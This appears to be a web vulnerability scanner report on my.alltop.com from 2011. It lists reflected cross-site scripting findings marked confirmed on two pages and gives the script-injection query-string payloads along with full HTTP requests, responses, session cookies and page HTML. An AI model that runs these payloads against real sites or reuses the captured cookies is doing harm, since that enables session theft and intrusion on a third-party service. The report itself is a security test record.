User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:18 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:19 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/a

/alpha/a CONFIRMED

http://my.alltop.com/alpha/a?'"--></style></script><script>alert(0x000135)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000135)</script>

Request

GET /alpha/a?'"--></style></script><script>netsparker(0x000135)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:16 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:19 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/b

/alpha/b CONFIRMED

http://my.alltop.com/alpha/b?'"--></style></script><script>alert(0x00017A)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00017A)</script>

Request

GET /alpha/b?'"--></style></script><script>netsparker(0x00017A)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
